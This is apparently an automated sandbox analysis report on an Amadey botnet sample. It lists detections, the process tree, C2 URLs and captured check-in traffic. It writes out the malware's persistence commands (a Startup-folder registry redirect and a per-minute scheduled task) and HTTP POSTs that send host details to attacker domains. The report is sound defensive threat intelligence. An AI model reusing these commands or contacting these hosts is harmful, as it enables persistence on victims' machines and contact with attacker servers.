Windows Analysis Report
S7AGd447vH.exe

Overview

General Information

Sample name: S7AGd447vH.exe (renamed because original name is a hash value)
Original sample name: 5F5C1A5DF77079F56EB5A61D19666728.exe
Analysis ID: 1564918
MD5: 5f5c1a5df77079f56eb5a61d19666728
SHA1: c2a99ac26eab563d62137c264b1a8cc9966342b9
SHA256: 0b84cbf4fa7c5be869aaa09b09cbb49edcdaa3e88675304db0ee4fa498adc4c5
Tags: Amadey, exe, user-abuse_ch

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey bot
Yara detected Amadey's stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Dllhost Internet Connection
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Unusual Parent Process For Cmd.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

  • System is w10x64
  • S7AGd447vH.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\S7AGd447vH.exe" MD5: 5F5C1A5DF77079F56EB5A61D19666728)
    • dllhost.exe (PID: 7608 cmdline: "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" MD5: 5F5C1A5DF77079F56EB5A61D19666728)
      • cmd.exe (PID: 7676 cmdline: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\ MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7776 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\ MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • schtasks.exe (PID: 7708 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • dllhost.exe (PID: 7856 cmdline: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe MD5: 5F5C1A5DF77079F56EB5A61D19666728)
  • dllhost.exe (PID: 7192 cmdline: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe MD5: 5F5C1A5DF77079F56EB5A61D19666728)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": ["web.jsonpost.xyz/sj2vMs/index.php", "web.xmlpost.xyz/sj2vMs/index.php"], "Version": "2.71"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security

Source | Rule | Description | Author | Strings
00000001.00000003.1833879370.000000000088D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security
00000001.00000003.1817745095.000000000088D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security
00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Amadey_7abb059b | unknown | unknown
  • 0xae0d:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Amadey_c4df8d4a | unknown | unknown
  • 0x32bc4:$a1: D:\Mktmp\NL1\Release\NL1.pdb

Source | Rule | Description | Author | Strings
1.3.dllhost.exe.2204848.4.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
1.3.dllhost.exe.2204848.4.unpack | Windows_Trojan_Amadey_7abb059b | unknown | unknown
  • 0x5a0d:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
1.3.dllhost.exe.2204848.4.unpack | Windows_Trojan_Amadey_c4df8d4a | unknown | unknown
  • 0x2d3c4:$a1: D:\Mktmp\NL1\Release\NL1.pdb
0.3.S7AGd447vH.exe.914800.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
0.3.S7AGd447vH.exe.914800.0.unpack | Windows_Trojan_Amadey_7abb059b | unknown | unknown
  • 0x5a0d:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56

              System Summary

              Source: File created, Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\S7AGd447vH.exe, ProcessId: 7524, TargetFilename: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
              Source: Process started, Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe, ParentCommandLine: "C:\Users\user\Desktop\S7AGd447vH.exe", ParentImage: C:\Users\user\Desktop\S7AGd447vH.exe, ParentProcessId: 7524, ParentProcessName: S7AGd447vH.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" , ProcessId: 7608, ProcessName: dllhost.exe
              Source: Process started, Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\, CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\, CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7676, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\, ProcessId: 7776, ProcessName: reg.exe
              Source: Network Connection, Author: bartblaze: Data: DestinationIp: 72.52.178.23, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe, Initiated: true, ProcessId: 7608, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
              Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe, ParentProcessId: 7608, ParentProcessName: dllhost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F, ProcessId: 7708, ProcessName: schtasks.exe
              Source: Process started, Author: Tim Rauch: Data: Command: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\, CommandLine: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe, ParentProcessId: 7608, ParentProcessName: dllhost.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\, ProcessId: 7676, ProcessName: cmd.exe

              Persistence and Installation Behavior

              Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe, ParentProcessId: 7608, ParentProcessName: dllhost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F, ProcessId: 7708, ProcessName: schtasks.exe

              AV Detection

              Source: S7AGd447vH.exe, Avira: detected
              Source: web.jsonpost.xyz/sj2vMs/index.php, Avira URL Cloud: Label: phishing
              Source: web.xmlpost.xyz/sj2vMs/index.php, Avira URL Cloud: Label: phishing
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe, Avira: detection malicious, Label: TR/Fraud.Gen8
              Source: 1.3.dllhost.exe.2204848.4.raw.unpack, Malware Configuration Extractor: Amadey {"C2 url": ["web.jsonpost.xyz/sj2vMs/index.php", "web.xmlpost.xyz/sj2vMs/index.php"], "Version": "2.71"}
              Source: web.jsonpost.xyz/sj2vMs/index.php, Virustotal: Detection: 9%
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe, ReversingLabs: Detection: 65%
              Source: S7AGd447vH.exe, ReversingLabs: Detection: 65%
              Source: S7AGd447vH.exe, Virustotal: Detection: 69%
              Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe, Joe Sandbox ML: detected
              Source: S7AGd447vH.exe, Joe Sandbox ML: detected

              Compliance

              Source: C:\Users\user\Desktop\S7AGd447vH.exe, Unpacked PE file: 0.2.S7AGd447vH.exe.400000.0.unpack
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe, Unpacked PE file: 7.2.dllhost.exe.400000.0.unpack
              Source: S7AGd447vH.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Binary string: OfficeDesktop.pdb source: S7AGd447vH.exe, dllhost.exe.0.dr
              Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: S7AGd447vH.exe, 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp, S7AGd447vH.exe, 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000002.1820165445.0000000000428000.00000004.00000001.01000000.00000005.sdmp, dllhost.exe, 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: combase.pdb source: S7AGd447vH.exe, 00000000.00000003.1704708297.0000000022900000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000003.1704573003.000000002266E000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749567916.0000000022AB0000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749409581.0000000022823000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819408619.0000000022688000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819679892.0000000022910000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: S7AGd447vH.exe, 00000000.00000003.1704342589.0000000022810000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000003.1704234456.0000000022664000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749047293.000000002282A000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749185768.00000000229D0000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1818941784.000000002268F000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819091073.0000000022830000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: S7AGd447vH.exe, 00000000.00000003.1704342589.0000000022810000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000003.1704234456.0000000022664000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749047293.000000002282A000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749185768.00000000229D0000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1818941784.000000002268F000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819091073.0000000022830000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: combase.pdbUGP source: S7AGd447vH.exe, 00000000.00000003.1704708297.0000000022900000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000003.1704573003.000000002266E000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749567916.0000000022AB0000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749409581.0000000022823000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819408619.0000000022688000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819679892.0000000022910000.00000004.00001000.00020000.00000000.sdmp

              Networking

              Source: Network traffic Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49732 -> 72.52.178.23:80
              Source: Network traffic Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49739 -> 72.52.178.23:80
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Network Connect: 72.52.178.23 80
              Source: Malware configuration extractor URLs: web.jsonpost.xyz/sj2vMs/index.php
              Source: Malware configuration extractor URLs: web.xmlpost.xyz/sj2vMs/index.php
              Source: DNS query: web.jsonpost.xyz
              Source: DNS query: web.xmlpost.xyz
              Source: global traffic HTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7 Host: web.jsonpost.xyz Content-Length: 98005 Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: web.jsonpost.xyz Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global traffic HTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----b9b9ff44e8c4fb7bf9d9e9a94afafff0 Host: web.jsonpost.xyz Content-Length: 99446 Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global traffic HTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----2da2ec123a554cc4f0e9e4f45f265c8c Host: web.jsonpost.xyz Content-Length: 102787 Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----75fc820eeb92975bff3e841961ce7c5b Host: web.jsonpost.xyz Content-Length: 98287 Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----0c493e27f64201eb17b9a0de8f16fea0 Host: web.jsonpost.xyz Content-Length: 98257 Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----88c41d18d04efae2b058311875d35af8 Host: web.jsonpost.xyz Content-Length: 99423 Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7 Host: web.jsonpost.xyz Content-Length: 98018 Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: web.jsonpost.xyz Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global traffic HTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----67f1dda3f58c30bca5812691cfd54a6e Host: web.jsonpost.xyz Content-Length: 98283 Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----20803717bf274c582f30f80916c596d3 Host: web.jsonpost.xyz Content-Length: 102801 Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----1f222d7432ca15c9e43b1e0ff82cdbaa Host: web.jsonpost.xyz Content-Length: 98266 Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----2b8041a10abd63097aaf92c151839ca7 Host: web.jsonpost.xyz Content-Length: 98296 Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----5add77a23e85c1c8c456f4525574afb1 Host: web.jsonpost.xyz Content-Length: 103478 Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----edaa48f9ea7e20f29ead8fcbe5fb1f54 Host: web.jsonpost.xyz Content-Length: 98554 Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7Host: web.jsonpost.xyzContent-Length: 97961Cache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 72.52.178.23 72.52.178.23
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_0040700B WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_0040700B
              Source: global trafficDNS traffic detected: DNS query: web.jsonpost.xyz
              Source: global trafficDNS traffic detected: DNS query: web.xmlpost.xyz
              Source: unknownHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: dllhost.exe, 00000001.00000003.2074636370.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806281208.00000000008F3000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1775452885.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074557062.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.jsonpost.xyz/sj2vMs/index.php
              Source: dllhost.exe, 00000001.00000003.1986592314.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.jsonpost.xyz/sj2vMs/index.php#
